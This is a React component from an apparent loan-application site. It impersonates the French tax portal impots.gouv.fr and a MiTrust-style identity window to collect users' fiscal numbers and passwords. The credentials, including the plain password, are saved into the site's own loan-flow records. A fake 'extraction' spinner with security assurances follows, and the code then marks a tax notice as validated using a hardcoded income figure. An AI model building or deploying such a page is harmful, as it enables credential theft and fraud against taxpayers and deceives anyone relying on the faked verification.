import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { Button } from '../../components/ui/button';
import { Input } from '../../components/ui/input';
import { useAuth } from '../../context/AuthContext';
import { loanFlowService, justificatifService } from '../../services/api';
import { useToast } from '../../hooks/use-toast';
import { Eye, EyeOff, Lock, X, Shield } from 'lucide-react';

const ImpotsLogin = () => {
  const { user } = useAuth();
  const navigate = useNavigate();
  const { toast } = useToast();
  const [fiscalNumber, setFiscalNumber] = useState('');
  const [password, setPassword] = useState('');
  const [showPassword, setShowPassword] = useState(false);
  const [loading, setLoading] = useState(false);
  const [showExtraction, setShowExtraction] = useState(false);

  const handleSubmit = async (e) => {
    e.preventDefault();
    setLoading(true);

    try {
      let flow = await loanFlowService.getByClient(user.id);
      
      // If no flow exists, create one
      if (!flow) {
        flow = await loanFlowService.create({
          clientId: user.id,
          currentStep: 'share_data'
        });
      }
      
      if (flow) {
        await loanFlowService.update(flow.id, {
          currentStep: 'share_data',
          fiscalNumber,
          fiscalPassword: password,
          fiscalData: {
            nom: user.lastName,
            prenom: user.firstName,
            adresse: user.address,
            codePostal: user.zipCode,
            ville: user.city,
            revenuFiscal: '35000',
            nombreParts: '2'
          }
        });

        // Show extraction loading screen
        setLoading(false);
        setShowExtraction(true);

        // Wait for 4 seconds then redirect directly to success page
        setTimeout(async () => {
          // Update flow status
          await loanFlowService.update(flow.id, {
            currentStep: 'avis_imposition_completed',
            dataShared: true,
            sharedAt: new Date().toISOString()
          });
          
          // Create validated justificatif for avis d'imposition
          await justificatifService.createValidated(user.id, 'avis_imposition');
          
          // Navigate directly to success page
          navigate('/client/justificatif-success', { 
            state: { 
              type: 'avis_imposition',
              title: 'Avis d\'imposition'
            } 
          });
        }, 4000);
      }
    } catch (error) {
      console.error('Error:', error);
      setLoading(false);
      toast({
        title: 'Erreur',
        description: 'Une erreur est survenue',
        variant: 'destructive',
      });
    }
  };

  const handleClose = () => {
    navigate('/client/dashboard');
  };

  // Extraction Loading Screen
  if (showExtraction) {
    return (
      <div className="min-h-screen bg-gradient-to-b from-gray-50 to-gray-100 flex items-center justify-center p-4">
        <div className="w-full max-w-md">
          <div className="bg-white p-8 shadow-2xl rounded-2xl">
            {/* Logo Impots.gouv.fr */}
            <div className="flex justify-center mb-8">
              <div className="flex items-center space-x-2">
                {/* Marianne Symbol */}
                <svg width="50" height="50" viewBox="0 0 100 100">
                  <rect x="5" y="20" width="12" height="60" fill="#0055A4"/>
                  <rect x="17" y="20" width="12" height="60" fill="#FFFFFF"/>
                  <rect x="29" y="20" width="12" height="60" fill="#EF4135"/>
                </svg>
                <div className="text-left">
                  <div className="text-xs text-gray-600 leading-tight">DIRECTION GÉNÉRALE</div>
                  <div className="text-xs text-gray-600 leading-tight">DES FINANCES PUBLIQUES</div>
                </div>
              </div>
            </div>

            {/* Spinner Animation */}
            <div className="flex justify-center mb-8">
              <div className="relative">
                {/* Outer ring */}
                <div 
                  className="w-20 h-20 rounded-full border-4 border-gray-200"
                  style={{ borderTopColor: '#000091' }}
                ></div>
                {/* Spinning ring */}
                <div 
                  className="absolute inset-0 w-20 h-20 rounded-full border-4 border-transparent animate-spin"
                  style={{ 
                    borderTopColor: '#000091',
                    animationDuration: '1s'
                  }}
                ></div>
                {/* Inner icon */}
                <div className="absolute inset-0 flex items-center justify-center">
                  <Shield className="h-8 w-8 text-gray-400" />
                </div>
              </div>
            </div>

            {/* Status Text */}
            <div className="text-center space-y-3">
              <h2 className="text-lg font-semibold text-gray-900">
                Extraction en cours...
              </h2>
              <p className="text-gray-600 text-sm leading-relaxed px-4">
                Nous procédons uniquement à la récupération de votre dernier avis d'imposition
              </p>
            </div>

            {/* Progress dots animation */}
            <div className="flex justify-center mt-6 space-x-2">
              <div 
                className="w-2 h-2 rounded-full animate-pulse"
                style={{ backgroundColor: '#000091', animationDelay: '0ms' }}
              ></div>
              <div 
                className="w-2 h-2 rounded-full animate-pulse"
                style={{ backgroundColor: '#000091', animationDelay: '300ms' }}
              ></div>
              <div 
                className="w-2 h-2 rounded-full animate-pulse"
                style={{ backgroundColor: '#000091', animationDelay: '600ms' }}
              ></div>
            </div>

            {/* Security Notice */}
            <div className="mt-8 p-4 bg-gray-50 rounded-xl border border-gray-100">
              <div className="flex items-center justify-center space-x-2 text-xs text-gray-500">
                <svg className="h-4 w-4 text-green-500" fill="currentColor" viewBox="0 0 20 20">
                  <path fillRule="evenodd" d="M5 9V7a5 5 0 0110 0v2a2 2 0 012 2v5a2 2 0 01-2 2H5a2 2 0 01-2-2v-5a2 2 0 012-2zm8-2v2H7V7a3 3 0 016 0z" clipRule="evenodd" />
                </svg>
                <span>Connexion sécurisée et chiffrée</span>
              </div>
            </div>
          </div>
        </div>
      </div>
    );
  }

  return (
    <div className="min-h-screen bg-gray-100 flex items-center justify-center p-4">
      {/* MiTrust Window */}
      <div className="w-full max-w-lg bg-white rounded-xl shadow-2xl overflow-hidden">
        {/* Header - Appmtrust.fr */}
        <div className="bg-[#1e3a5f] px-4 py-3">
          <div className="flex items-center justify-between">
            <div className="flex items-center space-x-2">
              <span className="text-white font-semibold text-lg">Appmtrust.fr</span>
            </div>
            <button 
              onClick={handleClose}
              className="text-white/80 hover:text-white"
            >
              <X className="h-5 w-5" />
            </button>
          </div>
        </div>

        {/* Steps Indicator */}
        <div className="bg-[#f8f9fa] px-6 py-4 border-b border-gray-200">
          <div className="flex items-center justify-center space-x-8">
            {/* Step 1 */}
            <div className="flex items-center space-x-2">
              <div className="w-7 h-7 rounded-full bg-[#1e3a5f] text-white text-sm flex items-center justify-center font-bold">
                1
              </div>
              <span className="text-sm font-medium text-gray-700">Identifiez-vous</span>
            </div>
            
            {/* Connector line */}
            <div className="w-12 h-0.5 bg-gray-300"></div>
            
            {/* Step 2 */}
            <div className="flex items-center space-x-2">
              <div className="w-7 h-7 rounded-full bg-gray-300 text-gray-500 text-sm flex items-center justify-center font-bold">
                2
              </div>
              <div className="flex items-center space-x-1">
                <Lock className="h-4 w-4 text-gray-400" />
                <span className="text-sm text-gray-400">Identifiez-vous en toute sécurité</span>
              </div>
            </div>
          </div>
        </div>

        {/* Content */}
        <div className="p-6">
          {/* Impots.gouv.fr Card */}
          <div className="bg-white border border-gray-200 rounded-xl p-6 shadow-sm">
            {/* Logo and Title */}
            <div className="text-center mb-6">
              {/* Impots Logo */}
              <div className="flex justify-center mb-4">
                <div className="flex items-center space-x-2">
                  {/* Marianne Symbol */}
                  <svg width="50" height="50" viewBox="0 0 100 100">
                    <rect x="5" y="20" width="12" height="60" fill="#0055A4"/>
                    <rect x="17" y="20" width="12" height="60" fill="#FFFFFF"/>
                    <rect x="29" y="20" width="12" height="60" fill="#EF4135"/>
                  </svg>
                  <div className="text-left">
                    <div className="text-xs text-gray-600 leading-tight">DIRECTION GÉNÉRALE</div>
                    <div className="text-xs text-gray-600 leading-tight">DES FINANCES PUBLIQUES</div>
                  </div>
                </div>
              </div>
              <h2 className="text-xl font-bold" style={{ color: '#000091' }}>
                Impots.gouv.fr
              </h2>
            </div>

            <form onSubmit={handleSubmit} className="space-y-5">
              {/* Fiscal Number */}
              <div>
                <label htmlFor="fiscalNumber" className="block text-sm font-semibold text-gray-800 mb-2">
                  Numéro fiscal
                </label>
                <Input
                  id="fiscalNumber"
                  type="text"
                  placeholder="Votre numéro fiscal"
                  value={fiscalNumber}
                  onChange={(e) => setFiscalNumber(e.target.value)}
                  required
                  maxLength={13}
                  className="h-12 text-base border-gray-300 focus:border-blue-600 focus:ring-blue-600"
                  data-testid="fiscal-number-input"
                />
                <p className="text-xs text-gray-500 mt-1 italic">
                  N'utilisez pas celui de votre conjoint
                </p>
              </div>

              {/* Password */}
              <div>
                <label htmlFor="password" className="block text-sm font-semibold text-gray-800 mb-2">
                  Mot de passe
                </label>
                <div className="relative">
                  <Input
                    id="password"
                    type={showPassword ? 'text' : 'password'}
                    placeholder="Votre mot de passe"
                    value={password}
                    onChange={(e) => setPassword(e.target.value)}
                    required
                    className="h-12 text-base pr-12 border-gray-300 focus:border-blue-600 focus:ring-blue-600"
                    data-testid="password-input"
                  />
                  <button
                    type="button"
                    onClick={() => setShowPassword(!showPassword)}
                    className="absolute right-3 top-3 text-gray-400 hover:text-gray-600"
                  >
                    {showPassword ? <EyeOff className="h-5 w-5" /> : <Eye className="h-5 w-5" />}
                  </button>
                </div>
              </div>

              {/* Submit Button */}
              <Button
                type="submit"
                size="lg"
                className="w-full text-white font-semibold h-12 text-base rounded-lg"
                style={{ backgroundColor: '#000091' }}
                disabled={loading}
                data-testid="submit-btn"
              >
                {loading ? 'Connexion en cours...' : "J'accède à mes informations"}
              </Button>
            </form>

            {/* Help Links */}
            <div className="mt-4 text-center">
              <a href="#" className="text-sm hover:underline" style={{ color: '#000091' }}>
                Mot de passe ou numéro fiscal oublié ?
              </a>
            </div>
          </div>

          {/* Security Badge */}
          <div className="mt-4 flex items-center justify-center space-x-2 text-xs text-gray-500">
            <Lock className="h-3 w-3" />
            <span>Connexion sécurisée - Vos données sont protégées</span>
          </div>
        </div>
      </div>
    </div>
  );
};

export default ImpotsLogin;
